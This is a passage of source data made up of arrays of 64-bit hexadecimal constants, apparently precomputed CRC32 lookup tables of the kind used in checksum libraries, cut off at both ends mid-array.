0x2d3d6d0800000000, 0x976c649100000000, 0x015c63e600000000, 0xf4516b6b00000000, 0x62616c1c00000000, 0xd830658500000000, 0x4e0062f200000000, 0xed95066c00000000, 0x7ba5011b00000000, 0xc1f4088200000000, 0x57c40ff500000000, 0xc6d9b06500000000, 0x50e9b71200000000, 0xeab8be8b00000000, 0x7c88b9fc00000000, 0xdf1ddd6200000000, 0x492dda1500000000, 0xf37cd38c00000000, 0x654cd4fb00000000, 0x5861b24d00000000, 0xce51b53a00000000, 0x7400bca300000000, 0xe230bbd400000000, 0x41a5df4a00000000, 0xd795d83d00000000, 0x6dc4d1a400000000, 0xfbf4d6d300000000, 0x6ae9694300000000, 0xfcd96e3400000000, 0x468867ad00000000, 0xd0b860da00000000, 0x732d044400000000, 0xe51d033300000000, 0x5f4c0aaa00000000, 0xc97c0ddd00000000, 0x3c71055000000000, 0xaa41022700000000, 0x10100bbe00000000, 0x86200cc900000000, 0x25b5685700000000, 0xb3856f2000000000, 0x09d466b900000000, 0x9fe461ce00000000, 0x0ef9de5e00000000, 0x98c9d92900000000, 0x2298d0b000000000, 0xb4a8d7c700000000, 0x173db35900000000, 0x810db42e00000000, 0x3b5cbdb700000000, 0xad6cbac000000000, 0x2083b8ed00000000, 0xb6b3bf9a00000000, 0x0ce2b60300000000, 0x9ad2b17400000000, 0x3947d5ea00000000, 0xaf77d29d00000000, 0x1526db0400000000, 0x8316dc7300000000, 0x120b63e300000000, 0x843b649400000000, 0x3e6a6d0d00000000, 0xa85a6a7a00000000, 0x0bcf0ee400000000, 0x9dff099300000000, 0x27ae000a00000000, 0xb19e077d00000000, 0x44930ff000000000, 0xd2a3088700000000, 0x68f2011e00000000, 0xfec2066900000000, 0x5d5762f700000000, 0xcb67658000000000, 0x71366c1900000000, 0xe7066b6e00000000, 0x761bd4fe00000000, 0xe02bd38900000000, 0x5a7ada1000000000, 0xcc4add6700000000, 0x6fdfb9f900000000, 0xf9efbe8e00000000, 0x43beb71700000000, 0xd58eb06000000000, 0xe8a3d6d600000000, 0x7e93d1a100000000, 0xc4c2d83800000000, 0x52f2df4f00000000, 0xf167bbd100000000, 0x6757bca600000000, 0xdd06b53f00000000, 0x4b36b24800000000, 0xda2b0dd800000000, 0x4c1b0aaf00000000, 0xf64a033600000000, 0x607a044100000000, 0xc3ef60df00000000, 0x55df67a800000000, 0xef8e6e3100000000, 0x79be694600000000, 0x8cb361cb00000000, 0x1a8366bc00000000, 0xa0d26f2500000000, 0x36e2685200000000, 0x95770ccc00000000, 0x03470bbb00000000, 0xb916022200000000, 0x2f26055500000000, 0xbe3bbac500000000, 0x280bbdb200000000, 0x925ab42b00000000, 0x046ab35c00000000, 0xa7ffd7c200000000, 0x31cfd0b500000000, 0x8b9ed92c00000000, 0x1daede5b00000000, 0xb0c2649b00000000, 0x26f263ec00000000, 0x9ca36a7500000000, 0x0a936d0200000000, 0xa906099c00000000, 0x3f360eeb00000000, 0x8567077200000000, 0x1357000500000000, 0x824abf9500000000, 0x147ab8e200000000, 0xae2bb17b00000000, 0x381bb60c00000000, 0x9b8ed29200000000, 0x0dbed5e500000000, 0xb7efdc7c00000000, 0x21dfdb0b00000000, 0xd4d2d38600000000, 0x42e2d4f100000000, 0xf8b3dd6800000000, 0x6e83da1f00000000, 0xcd16be8100000000, 0x5b26b9f600000000, 0xe177b06f00000000, 0x7747b71800000000, 0xe65a088800000000, 0x706a0fff00000000, 0xca3b066600000000, 0x5c0b011100000000, 0xff9e658f00000000, 0x69ae62f800000000, 0xd3ff6b6100000000, 0x45cf6c1600000000, 0x78e20aa000000000, 0xeed20dd700000000, 0x5483044e00000000, 0xc2b3033900000000, 0x612667a700000000, 0xf71660d000000000, 0x4d47694900000000, 0xdb776e3e00000000, 0x4a6ad1ae00000000, 0xdc5ad6d900000000, 0x660bdf4000000000, 0xf03bd83700000000, 0x53aebca900000000, 0xc59ebbde00000000, 0x7fcfb24700000000, 0xe9ffb53000000000, 0x1cf2bdbd00000000, 0x8ac2baca00000000, 0x3093b35300000000, 0xa6a3b42400000000, 0x0536d0ba00000000, 0x9306d7cd00000000, 0x2957de5400000000, 0xbf67d92300000000, 0x2e7a66b300000000, 0xb84a61c400000000, 0x021b685d00000000, 0x942b6f2a00000000, 0x37be0bb400000000, 0xa18e0cc300000000, 0x1bdf055a00000000, 0x8def022d00000000}, {0x0000000000000000, 0x41311b1900000000, 0x8262363200000000, 0xc3532d2b00000000, 0x04c56c6400000000, 0x45f4777d00000000, 0x86a75a5600000000, 0xc796414f00000000, 0x088ad9c800000000, 0x49bbc2d100000000, 0x8ae8effa00000000, 0xcbd9f4e300000000, 0x0c4fb5ac00000000, 0x4d7eaeb500000000, 0x8e2d839e00000000, 0xcf1c988700000000, 0x5112c24a00000000, 0x1023d95300000000, 0xd370f47800000000, 0x9241ef6100000000, 0x55d7ae2e00000000, 0x14e6b53700000000, 0xd7b5981c00000000, 0x9684830500000000, 0x59981b8200000000, 0x18a9009b00000000, 0xdbfa2db000000000, 0x9acb36a900000000, 0x5d5d77e600000000, 0x1c6c6cff00000000, 0xdf3f41d400000000, 0x9e0e5acd00000000, 0xa224849500000000, 0xe3159f8c00000000, 0x2046b2a700000000, 0x6177a9be00000000, 0xa6e1e8f100000000, 0xe7d0f3e800000000, 0x2483dec300000000, 0x65b2c5da00000000, 0xaaae5d5d00000000, 0xeb9f464400000000, 0x28cc6b6f00000000, 0x69fd707600000000, 0xae6b313900000000, 0xef5a2a2000000000, 0x2c09070b00000000, 0x6d381c1200000000, 0xf33646df00000000, 0xb2075dc600000000, 0x715470ed00000000, 0x30656bf400000000, 0xf7f32abb00000000, 0xb6c231a200000000, 0x75911c8900000000, 0x34a0079000000000, 0xfbbc9f1700000000, 0xba8d840e00000000, 0x79dea92500000000, 0x38efb23c00000000, 0xff79f37300000000, 0xbe48e86a00000000, 0x7d1bc54100000000, 0x3c2ade5800000000, 0x054f79f000000000, 0x447e62e900000000, 0x872d4fc200000000, 0xc61c54db00000000, 0x018a159400000000, 0x40bb0e8d00000000, 0x83e823a600000000, 0xc2d938bf00000000, 0x0dc5a03800000000, 0x4cf4bb2100000000, 0x8fa7960a00000000, 0xce968d1300000000, 0x0900cc5c00000000, 0x4831d74500000000, 0x8b62fa6e00000000, 0xca53e17700000000, 0x545dbbba00000000, 0x156ca0a300000000, 0xd63f8d8800000000, 0x970e969100000000, 0x5098d7de00000000, 0x11a9ccc700000000, 0xd2fae1ec00000000, 0x93cbfaf500000000, 0x5cd7627200000000, 0x1de6796b00000000, 0xdeb5544000000000, 0x9f844f5900000000, 0x58120e1600000000, 0x1923150f00000000, 0xda70382400000000, 0x9b41233d00000000, 0xa76bfd6500000000, 0xe65ae67c00000000, 0x2509cb5700000000, 0x6438d04e00000000, 0xa3ae910100000000, 0xe29f8a1800000000, 0x21cca73300000000, 0x60fdbc2a00000000, 0xafe124ad00000000, 0xeed03fb400000000, 0x2d83129f00000000, 0x6cb2098600000000, 0xab2448c900000000, 0xea1553d000000000, 0x29467efb00000000, 0x687765e200000000, 0xf6793f2f00000000, 0xb748243600000000, 0x741b091d00000000, 0x352a120400000000, 0xf2bc534b00000000, 0xb38d485200000000, 0x70de657900000000, 0x31ef7e6000000000, 0xfef3e6e700000000, 0xbfc2fdfe00000000, 0x7c91d0d500000000, 0x3da0cbcc00000000, 0xfa368a8300000000, 0xbb07919a00000000, 0x7854bcb100000000, 0x3965a7a800000000, 0x4b98833b00000000, 0x0aa9982200000000, 0xc9fab50900000000, 0x88cbae1000000000, 0x4f5def5f00000000, 0x0e6cf44600000000, 0xcd3fd96d00000000, 0x8c0ec27400000000, 0x43125af300000000, 0x022341ea00000000, 0xc1706cc100000000, 0x804177d800000000, 0x47d7369700000000, 0x06e62d8e00000000, 0xc5b500a500000000, 0x84841bbc00000000, 0x1a8a417100000000, 0x5bbb5a6800000000, 0x98e8774300000000, 0xd9d96c5a00000000, 0x1e4f2d1500000000, 0x5f7e360c00000000, 0x9c2d1b2700000000, 0xdd1c003e00000000, 0x120098b900000000, 0x533183a000000000, 0x9062ae8b00000000, 0xd153b59200000000, 0x16c5f4dd00000000, 0x57f4efc400000000, 0x94a7c2ef00000000, 0xd596d9f600000000, 0xe9bc07ae00000000, 0xa88d1cb700000000, 0x6bde319c00000000, 0x2aef2a8500000000, 0xed796bca00000000, 0xac4870d300000000, 0x6f1b5df800000000, 0x2e2a46e100000000, 0xe136de6600000000, 0xa007c57f00000000, 0x6354e85400000000, 0x2265f34d00000000, 0xe5f3b20200000000, 0xa4c2a91b00000000, 0x6791843000000000, 0x26a09f2900000000, 0xb8aec5e400000000, 0xf99fdefd00000000, 0x3accf3d600000000, 0x7bfde8cf00000000, 0xbc6ba98000000000, 0xfd5ab29900000000, 0x3e099fb200000000, 0x7f3884ab00000000, 0xb0241c2c00000000, 0xf115073500000000, 0x32462a1e00000000, 0x7377310700000000, 0xb4e1704800000000, 0xf5d06b5100000000, 0x3683467a00000000, 0x77b25d6300000000, 0x4ed7facb00000000, 0x0fe6e1d200000000, 0xccb5ccf900000000, 0x8d84d7e000000000, 0x4a1296af00000000, 0x0b238db600000000, 0xc870a09d00000000, 0x8941bb8400000000, 0x465d230300000000, 0x076c381a00000000, 0xc43f153100000000, 0x850e0e2800000000, 0x42984f6700000000, 0x03a9547e00000000, 0xc0fa795500000000, 0x81cb624c00000000, 0x1fc5388100000000, 0x5ef4239800000000, 0x9da70eb300000000, 0xdc9615aa00000000, 0x1b0054e500000000, 0x5a314ffc00000000, 0x996262d700000000, 0xd85379ce00000000, 0x174fe14900000000, 0x567efa5000000000, 0x952dd77b00000000, 0xd41ccc6200000000, 0x138a8d2d00000000, 0x52bb963400000000, 0x91e8bb1f00000000, 0xd0d9a00600000000, 0xecf37e5e00000000, 0xadc2654700000000, 0x6e91486c00000000, 0x2fa0537500000000, 0xe836123a00000000, 0xa907092300000000, 0x6a54240800000000, 0x2b653f1100000000, 0xe479a79600000000, 0xa548bc8f00000000, 0x661b91a400000000, 0x272a8abd00000000, 0xe0bccbf200000000, 0xa18dd0eb00000000, 0x62defdc000000000, 0x23efe6d900000000, 0xbde1bc1400000000, 0xfcd0a70d00000000, 0x3f838a2600000000, 0x7eb2913f00000000, 0xb924d07000000000, 0xf815cb6900000000, 0x3b46e64200000000, 0x7a77fd5b00000000, 0xb56b65dc00000000, 0xf45a7ec500000000, 0x370953ee00000000, 0x763848f700000000, 0xb1ae09b800000000, 0xf09f12a100000000, 0x33cc3f8a00000000, 0x72fd249300000000}, {0x0000000000000000, 0x376ac20100000000, 0x6ed4840300000000, 0x59be460200000000, 0xdca8090700000000, 0xebc2cb0600000000, 0xb27c8d0400000000, 0x85164f0500000000, 0xb851130e00000000, 0x8f3bd10f00000000, 0xd685970d00000000, 0xe1ef550c00000000, 0x64f91a0900000000, 0x5393d80800000000, 0x0a2d9e0a00000000, 0x3d475c0b00000000, 0x70a3261c00000000, 0x47c9e41d00000000, 0x1e77a21f00000000, 0x291d601e00000000, 0xac0b2f1b00000000, 0x9b61ed1a00000000, 0xc2dfab1800000000, 0xf5b5691900000000, 0xc8f2351200000000, 0xff98f71300000000, 0xa626b11100000000, 0x914c731000000000, 0x145a3c1500000000, 0x2330fe1400000000, 0x7a8eb81600000000, 0x4de47a1700000000, 0xe0464d3800000000, 0xd72c8f3900000000, 0x8e92c93b00000000, 0xb9f80b3a00000000, 0x3cee443f00000000, 0x0b84863e00000000, 0x523ac03c00000000, 0x6550023d00000000, 0x58175e3600000000, 0x6f7d9c3700000000, 0x36c3da3500000000, 0x01a9183400000000, 0x84bf573100000000, 0xb3d5953000000000, 0xea6bd33200000000, 0xdd01113300000000, 0x90e56b2400000000, 0xa78fa92500000000, 0xfe31ef2700000000, 0xc95b2d2600000000, 0x4c4d622300000000, 0x7b27a02200000000, 0x2299e62000000000, 0x15f3242100000000, 0x28b4782a00000000, 0x1fdeba2b00000000, 0x4660fc2900000000, 0x710a3e2800000000, 0xf41c712d00000000, 0xc376b32c00000000, 0x9ac8f52e00000000, 0xada2372f00000000, 0xc08d9a7000000000, 0xf7e7587100000000, 0xae591e7300000000, 0x9933dc7200000000, 0x1c25937700000000, 0x2b4f517600000000, 0x72f1177400000000, 0x459bd57500000000, 0x78dc897e00000000, 0x4fb64b7f00000000, 0x16080d7d00000000, 0x2162cf7c00000000, 0xa474807900000000, 0x931e427800000000, 0xcaa0047a00000000, 0xfdcac67b00000000, 0xb02ebc6c00000000, 0x87447e6d00000000, 0xdefa386f00000000, 0xe990fa6e00000000, 0x6c86b56b00000000, 0x5bec776a00000000, 0x0252316800000000, 0x3538f36900000000, 0x087faf6200000000, 0x3f156d6300000000, 0x66ab2b6100000000, 0x51c1e96000000000, 0xd4d7a66500000000, 0xe3bd646400000000, 0xba03226600000000, 0x8d69e06700000000, 0x20cbd74800000000, 0x17a1154900000000, 0x4e1f534b00000000, 0x7975914a00000000, 0xfc63de4f00000000, 0xcb091c4e00000000, 0x92b75a4c00000000, 0xa5dd984d00000000, 0x989ac44600000000, 0xaff0064700000000, 0xf64e404500000000, 0xc124824400000000, 0x4432cd4100000000, 0x73580f4000000000, 0x2ae6494200000000, 0x1d8c8b4300000000, 0x5068f15400000000, 0x6702335500000000, 0x3ebc755700000000, 0x09d6b75600000000, 0x8cc0f85300000000, 0xbbaa3a5200000000, 0xe2147c5000000000, 0xd57ebe5100000000, 0xe839e25a00000000, 0xdf53205b00000000, 0x86ed665900000000, 0xb187a45800000000, 0x3491eb5d00000000, 0x03fb295c00000000, 0x5a456f5e00000000, 0x6d2fad5f00000000, 0x801b35e100000000, 0xb771f7e000000000, 0xeecfb1e200000000, 0xd9a573e300000000, 0x5cb33ce600000000, 0x6bd9fee700000000, 0x3267b8e500000000, 0x050d7ae400000000, 0x384a26ef00000000, 0x0f20e4ee00000000, 0x569ea2ec00000000, 0x61f460ed00000000, 0xe4e22fe800000000, 0xd388ede900000000, 0x8a36abeb00000000, 0xbd5c69ea00000000, 0xf0b813fd00000000, 0xc7d2d1fc00000000, 0x9e6c97fe00000000, 0xa90655ff00000000, 0x2c101afa00000000, 0x1b7ad8fb00000000, 0x42c49ef900000000, 0x75ae5cf800000000, 0x48e900f300000000, 0x7f83c2f200000000, 0x263d84f000000000, 0x115746f100000000, 0x944109f400000000, 0xa32bcbf500000000, 0xfa958df700000000, 0xcdff4ff600000000, 0x605d78d900000000, 0x5737bad800000000, 0x0e89fcda00000000, 0x39e33edb00000000, 0xbcf571de00000000, 0x8b9fb3df00000000, 0xd221f5dd00000000, 0xe54b37dc00000000, 0xd80c6bd700000000, 0xef66a9d600000000, 0xb6d8efd400000000, 0x81b22dd500000000, 0x04a462d000000000, 0x33cea0d100000000, 0x6a70e6d300000000, 0x5d1a24d200000000, 0x10fe5ec500000000, 0x27949cc400000000, 0x7e2adac600000000, 0x494018c700000000, 0xcc5657c200000000, 0xfb3c95c300000000, 0xa282d3c100000000, 0x95e811c000000000, 0xa8af4dcb00000000, 0x9fc58fca00000000, 0xc67bc9c800000000, 0xf1110bc900000000, 0x740744cc00000000, 0x436d86cd00000000, 0x1ad3c0cf00000000, 0x2db902ce00000000, 0x4096af9100000000, 0x77fc6d9000000000, 0x2e422b9200000000, 0x1928e99300000000, 0x9c3ea69600000000, 0xab54649700000000, 0xf2ea229500000000, 0xc580e09400000000, 0xf8c7bc9f00000000, 0xcfad7e9e00000000, 0x9613389c00000000, 0xa179fa9d00000000, 0x246fb59800000000, 0x1305779900000000, 0x4abb319b00000000, 0x7dd1f39a00000000, 0x3035898d00000000, 0x075f4b8c00000000, 0x5ee10d8e00000000, 0x698bcf8f00000000, 0xec9d808a00000000, 0xdbf7428b00000000, 0x8249048900000000, 0xb523c68800000000, 0x88649a8300000000, 0xbf0e588200000000, 0xe6b01e8000000000, 0xd1dadc8100000000, 0x54cc938400000000, 0x63a6518500000000, 0x3a18178700000000, 0x0d72d58600000000, 0xa0d0e2a900000000, 0x97ba20a800000000, 0xce0466aa00000000, 0xf96ea4ab00000000, 0x7c78ebae00000000, 0x4b1229af00000000, 0x12ac6fad00000000, 0x25c6adac00000000, 0x1881f1a700000000, 0x2feb33a600000000, 0x765575a400000000, 0x413fb7a500000000, 0xc429f8a000000000, 0xf3433aa100000000, 0xaafd7ca300000000, 0x9d97bea200000000, 0xd073c4b500000000, 0xe71906b400000000, 0xbea740b600000000, 0x89cd82b700000000, 0x0cdbcdb200000000, 0x3bb10fb300000000, 0x620f49b100000000, 0x55658bb000000000, 0x6822d7bb00000000, 0x5f4815ba00000000, 0x06f653b800000000, 0x319c91b900000000, 0xb48adebc00000000, 0x83e01cbd00000000, 0xda5e5abf00000000, 0xed3498be00000000}, {0x0000000000000000, 0x6567bcb800000000, 0x8bc809aa00000000, 0xeeafb51200000000, 0x5797628f00000000, 0x32f0de3700000000, 0xdc5f6b2500000000, 0xb938d79d00000000, 0xef28b4c500000000, 0x8a4f087d00000000, 0x64e0bd6f00000000, 0x018701d700000000, 0xb8bfd64a00000000, 0xddd86af200000000, 0x3377dfe000000000, 0x5610635800000000, 0x9f57195000000000, 0xfa30a5e800000000, 0x149f10fa00000000, 0x71f8ac4200000000, 0xc8c07bdf00000000, 0xada7c76700000000, 0x4308727500000000, 0x266fcecd00000000, 0x707fad9500000000, 0x1518112d00000000, 0xfbb7a43f00000000, 0x9ed0188700000000, 0x27e8cf1a00000000, 0x428f73a200000000, 0xac20c6b000000000, 0xc9477a0800000000, 0x3eaf32a000000000, 0x5bc88e1800000000, 0xb5673b0a00000000, 0xd00087b200000000, 0x6938502f00000000, 0x0c5fec9700000000, 0xe2f0598500000000, 0x8797e53d00000000, 0xd187866500000000, 0xb4e03add00000000, 0x5a4f8fcf00000000, 0x3f28337700000000, 0x8610e4ea00000000, 0xe377585200000000, 0x0dd8ed4000000000, 0x68bf51f800000000, 0xa1f82bf000000000, 0xc49f974800000000, 0x2a30225a00000000, 0x4f579ee200000000, 0xf66f497f00000000, 0x9308f5c700000000, 0x7da740d500000000, 0x18c0fc6d00000000, 0x4ed09f3500000000, 0x2bb7238d00000000, 0xc518969f00000000, 0xa07f2a2700000000, 0x1947fdba00000000, 0x7c20410200000000, 0x928ff41000000000, 0xf7e848a800000000, 0x3d58149b00000000, 0x583fa82300000000, 0xb6901d3100000000, 0xd3f7a18900000000, 0x6acf761400000000, 0x0fa8caac00000000, 0xe1077fbe00000000, 0x8460c30600000000, 0xd270a05e00000000, 0xb7171ce600000000, 0x59b8a9f400000000, 0x3cdf154c00000000, 0x85e7c2d100000000, 0xe0807e6900000000, 0x0e2fcb7b00000000, 0x6b4877c300000000, 0xa20f0dcb00000000, 0xc768b17300000000, 0x29c7046100000000, 0x4ca0b8d900000000, 0xf5986f4400000000, 0x90ffd3fc00000000, 0x7e5066ee00000000, 0x1b37da5600000000, 0x4d27b90e00000000, 0x284005b600000000, 0xc6efb0a400000000, 0xa3880c1c00000000, 0x1ab0db8100000000, 0x7fd7673900000000, 0x9178d22b00000000, 0xf41f6e9300000000, 0x03f7263b00000000, 0x66909a8300000000, 0x883f2f9100000000, 0xed58932900000000, 0x546044b400000000, 0x3107f80c00000000, 0xdfa84d1e00000000, 0xbacff1a600000000, 0xecdf92fe00000000, 0x89b82e4600000000, 0x67179b5400000000, 0x027027ec00000000, 0xbb48f07100000000, 0xde2f4cc900000000, 0x3080f9db00000000, 0x55e7456300000000, 0x9ca03f6b00000000, 0xf9c783d300000000, 0x176836c100000000, 0x720f8a7900000000, 0xcb375de400000000, 0xae50e15c00000000, 0x40ff544e00000000, 0x2598e8f600000000, 0x73888bae00000000, 0x16ef371600000000, 0xf840820400000000, 0x9d273ebc00000000, 0x241fe92100000000, 0x4178559900000000, 0xafd7e08b00000000, 0xcab05c3300000000, 0x3bb659ed00000000, 0x5ed1e55500000000, 0xb07e504700000000, 0xd519ecff00000000, 0x6c213b6200000000, 0x094687da00000000, 0xe7e932c800000000, 0x828e8e7000000000, 0xd49eed2800000000, 0xb1f9519000000000, 0x5f56e48200000000, 0x3a31583a00000000, 0x83098fa700000000, 0xe66e331f00000000, 0x08c1860d00000000, 0x6da63ab500000000, 0xa4e140bd00000000, 0xc186fc0500000000, 0x2f29491700000000, 0x4a4ef5af00000000, 0xf376223200000000, 0x96119e8a00000000, 0x78be2b9800000000, 0x1dd9972000000000, 0x4bc9f47800000000, 0x2eae48c000000000, 0xc001fdd200000000, 0xa566416a00000000, 0x1c5e96f700000000, 0x79392a4f00000000, 0x97969f5d00000000, 0xf2f123e500000000, 0x05196b4d00000000, 0x607ed7f500000000, 0x8ed162e700000000, 0xebb6de5f00000000, 0x528e09c200000000, 0x37e9b57a00000000, 0xd946006800000000, 0xbc21bcd000000000, 0xea31df8800000000, 0x8f56633000000000, 0x61f9d62200000000, 0x049e6a9a00000000, 0xbda6bd0700000000, 0xd8c101bf00000000, 0x366eb4ad00000000, 0x5309081500000000, 0x9a4e721d00000000, 0xff29cea500000000, 0x11867bb700000000, 0x74e1c70f00000000, 0xcdd9109200000000, 0xa8beac2a00000000, 0x4611193800000000, 0x2376a58000000000, 0x7566c6d800000000, 0x10017a6000000000, 0xfeaecf7200000000, 0x9bc973ca00000000, 0x22f1a45700000000, 0x479618ef00000000, 0xa939adfd00000000, 0xcc5e114500000000, 0x06ee4d7600000000, 0x6389f1ce00000000, 0x8d2644dc00000000, 0xe841f86400000000, 0x51792ff900000000, 0x341e934100000000, 0xdab1265300000000, 0xbfd69aeb00000000, 0xe9c6f9b300000000, 0x8ca1450b00000000, 0x620ef01900000000, 0x07694ca100000000, 0xbe519b3c00000000, 0xdb36278400000000, 0x3599929600000000, 0x50fe2e2e00000000, 0x99b9542600000000, 0xfcdee89e00000000, 0x12715d8c00000000, 0x7716e13400000000, 0xce2e36a900000000, 0xab498a1100000000, 0x45e63f0300000000, 0x208183bb00000000, 0x7691e0e300000000, 0x13f65c5b00000000, 0xfd59e94900000000, 0x983e55f100000000, 0x2106826c00000000, 0x44613ed400000000, 0xaace8bc600000000, 0xcfa9377e00000000, 0x38417fd600000000, 0x5d26c36e00000000, 0xb389767c00000000, 0xd6eecac400000000, 0x6fd61d5900000000, 0x0ab1a1e100000000, 0xe41e14f300000000, 0x8179a84b00000000, 0xd769cb1300000000, 0xb20e77ab00000000, 0x5ca1c2b900000000, 0x39c67e0100000000, 0x80fea99c00000000, 0xe599152400000000, 0x0b36a03600000000, 0x6e511c8e00000000, 0xa716668600000000, 0xc271da3e00000000, 0x2cde6f2c00000000, 0x49b9d39400000000, 0xf081040900000000, 0x95e6b8b100000000, 0x7b490da300000000, 0x1e2eb11b00000000, 0x483ed24300000000, 0x2d596efb00000000, 0xc3f6dbe900000000, 0xa691675100000000, 0x1fa9b0cc00000000, 0x7ace0c7400000000, 0x9461b96600000000, 0xf10605de00000000}, {0x0000000000000000, 0xb029603d00000000, 0x6053c07a00000000, 0xd07aa04700000000, 0xc0a680f500000000, 0x708fe0c800000000, 0xa0f5408f00000000, 0x10dc20b200000000, 0xc14b703000000000, 0x7162100d00000000, 0xa118b04a00000000, 0x1131d07700000000, 0x01edf0c500000000, 0xb1c490f800000000, 0x61be30bf00000000, 0xd197508200000000, 0x8297e06000000000, 0x32be805d00000000, 0xe2c4201a00000000, 0x52ed402700000000, 0x4231609500000000, 0xf21800a800000000, 0x2262a0ef00000000, 0x924bc0d200000000, 0x43dc905000000000, 0xf3f5f06d00000000, 0x238f502a00000000, 0x93a6301700000000, 0x837a10a500000000, 0x3353709800000000, 0xe329d0df00000000, 0x5300b0e200000000, 0x042fc1c100000000, 0xb406a1fc00000000, 0x647c01bb00000000, 0xd455618600000000, 0xc489413400000000, 0x74a0210900000000, 0xa4da814e00000000, 0x14f3e17300000000, 0xc564b1f100000000, 0x754dd1cc00000000, 0xa537718b00000000, 0x151e11b600000000, 0x05c2310400000000, 0xb5eb513900000000, 0x6591f17e00000000, 0xd5b8914300000000, 0x86b821a100000000, 0x3691419c00000000, 0xe6ebe1db00000000, 0x56c281e600000000, 0x461ea15400000000, 0xf637c16900000000, 0x264d612e00000000, 0x9664011300000000, 0x47f3519100000000, 0xf7da31ac00000000, 0x27a091eb00000000, 0x9789f1d600000000, 0x8755d16400000000, 0x377cb15900000000, 0xe706111e00000000, 0x572f712300000000, 0x4958f35800000000, 0xf971936500000000, 0x290b332200000000, 0x9922531f00000000, 0x89fe73ad00000000, 0x39d7139000000000, 0xe9adb3d700000000, 0x5984d3ea00000000, 0x8813836800000000, 0x383ae35500000000, 0xe840431200000000, 0x5869232f00000000, 0x48b5039d00000000, 0xf89c63a000000000, 0x28e6c3e700000000, 0x98cfa3da00000000, 0xcbcf133800000000, 0x7be6730500000000, 0xab9cd34200000000, 0x1bb5b37f00000000, 0x0b6993cd00000000, 0xbb40f3f000000000, 0x6b3a53b700000000, 0xdb13338a00000000, 0x0a84630800000000, 0xbaad033500000000, 0x6ad7a37200000000, 0xdafec34f00000000, 0xca22e3fd00000000, 0x7a0b83c000000000, 0xaa71238700000000, 0x1a5843ba00000000, 0x4d77329900000000, 0xfd5e52a400000000, 0x2d24f2e300000000, 0x9d0d92de00000000, 0x8dd1b26c00000000, 0x3df8d25100000000, 0xed82721600000000, 0x5dab122b00000000, 0x8c3c42a900000000, 0x3c15229400000000, 0xec6f82d300000000, 0x5c46e2ee00000000, 0x4c9ac25c00000000, 0xfcb3a26100000000, 0x2cc9022600000000, 0x9ce0621b00000000, 0xcfe0d2f900000000, 0x7fc9b2c400000000, 0xafb3128300000000, 0x1f9a72be00000000, 0x0f46520c00000000, 0xbf6f323100000000, 0x6f15927600000000, 0xdf3cf24b00000000, 0x0eaba2c900000000, 0xbe82c2f400000000, 0x6ef862b300000000, 0xded1028e00000000, 0xce0d223c00000000, 0x7e24420100000000, 0xae5ee24600000000, 0x1e77827b00000000, 0x92b0e6b100000000, 0x2299868c00000000, 0xf2e326cb00000000, 0x42ca46f600000000, 0x5216664400000000, 0xe23f067900000000, 0x3245a63e00000000, 0x826cc60300000000, 0x53fb968100000000, 0xe3d2f6bc00000000, 0x33a856fb00000000, 0x838136c600000000, 0x935d167400000000, 0x2374764900000000, 0xf30ed60e00000000, 0x4327b63300000000, 0x102706d100000000, 0xa00e66ec00000000, 0x7074c6ab00000000, 0xc05da69600000000, 0xd081862400000000, 0x60a8e61900000000, 0xb0d2465e00000000, 0x00fb266300000000, 0xd16c76e100000000, 0x614516dc00000000, 0xb13fb69b00000000, 0x0116d6a600000000, 0x11caf61400000000, 0xa1e3962900000000, 0x7199366e00000000, 0xc1b0565300000000, 0x969f277000000000, 0x26b6474d00000000, 0xf6cce70a00000000, 0x46e5873700000000, 0x5639a78500000000, 0xe610c7b800000000, 0x366a67ff00000000, 0x864307c200000000, 0x57d4574000000000, 0xe7fd377d00000000, 0x3787973a00000000, 0x87aef70700000000, 0x9772d7b500000000, 0x275bb78800000000, 0xf72117cf00000000, 0x470877f200000000, 0x1408c71000000000, 0xa421a72d00000000, 0x745b076a00000000, 0xc472675700000000, 0xd4ae47e500000000, 0x648727d800000000, 0xb4fd879f00000000, 0x04d4e7a200000000, 0xd543b72000000000, 0x656ad71d00000000, 0xb510775a00000000, 0x0539176700000000, 0x15e537d500000000, 0xa5cc57e800000000, 0x75b6f7af00000000, 0xc59f979200000000, 0xdbe815e900000000, 0x6bc175d400000000, 0xbbbbd59300000000, 0x0b92b5ae00000000, 0x1b4e951c00000000, 0xab67f52100000000, 0x7b1d556600000000, 0xcb34355b00000000, 0x1aa365d900000000, 0xaa8a05e400000000, 0x7af0a5a300000000, 0xcad9c59e00000000, 0xda05e52c00000000, 0x6a2c851100000000, 0xba56255600000000, 0x0a7f456b00000000, 0x597ff58900000000, 0xe95695b400000000, 0x392c35f300000000, 0x890555ce00000000, 0x99d9757c00000000, 0x29f0154100000000, 0xf98ab50600000000, 0x49a3d53b00000000, 0x983485b900000000, 0x281de58400000000, 0xf86745c300000000, 0x484e25fe00000000, 0x5892054c00000000, 0xe8bb657100000000, 0x38c1c53600000000, 0x88e8a50b00000000, 0xdfc7d42800000000, 0x6feeb41500000000, 0xbf94145200000000, 0x0fbd746f00000000, 0x1f6154dd00000000, 0xaf4834e000000000, 0x7f3294a700000000, 0xcf1bf49a00000000, 0x1e8ca41800000000, 0xaea5c42500000000, 0x7edf646200000000, 0xcef6045f00000000, 0xde2a24ed00000000, 0x6e0344d000000000, 0xbe79e49700000000, 0x0e5084aa00000000, 0x5d50344800000000, 0xed79547500000000, 0x3d03f43200000000, 0x8d2a940f00000000, 0x9df6b4bd00000000, 0x2ddfd48000000000, 0xfda574c700000000, 0x4d8c14fa00000000, 0x9c1b447800000000, 0x2c32244500000000, 0xfc48840200000000, 0x4c61e43f00000000, 0x5cbdc48d00000000, 0xec94a4b000000000, 0x3cee04f700000000, 0x8cc764ca00000000}, {0x0000000000000000, 0xa5d35ccb00000000, 0x0ba1c84d00000000, 0xae72948600000000, 0x1642919b00000000, 0xb391cd5000000000, 0x1de359d600000000, 0xb830051d00000000, 0x6d8253ec00000000, 0xc8510f2700000000, 0x66239ba100000000, 0xc3f0c76a00000000, 0x7bc0c27700000000, 0xde139ebc00000000, 0x70610a3a00000000, 0xd5b256f100000000, 0x9b02d60300000000, 0x3ed18ac800000000, 0x90a31e4e00000000, 0x3570428500000000, 0x8d40479800000000, 0x28931b5300000000, 0x86e18fd500000000, 0x2332d31e00000000, 0xf68085ef00000000, 0x5353d92400000000, 0xfd214da200000000, 0x58f2116900000000, 0xe0c2147400000000, 0x451148bf00000000, 0xeb63dc3900000000, 0x4eb080f200000000, 0x3605ac0700000000, 0x93d6f0cc00000000, 0x3da4644a00000000, 0x9877388100000000, 0x20473d9c00000000, 0x8594615700000000, 0x2be6f5d100000000, 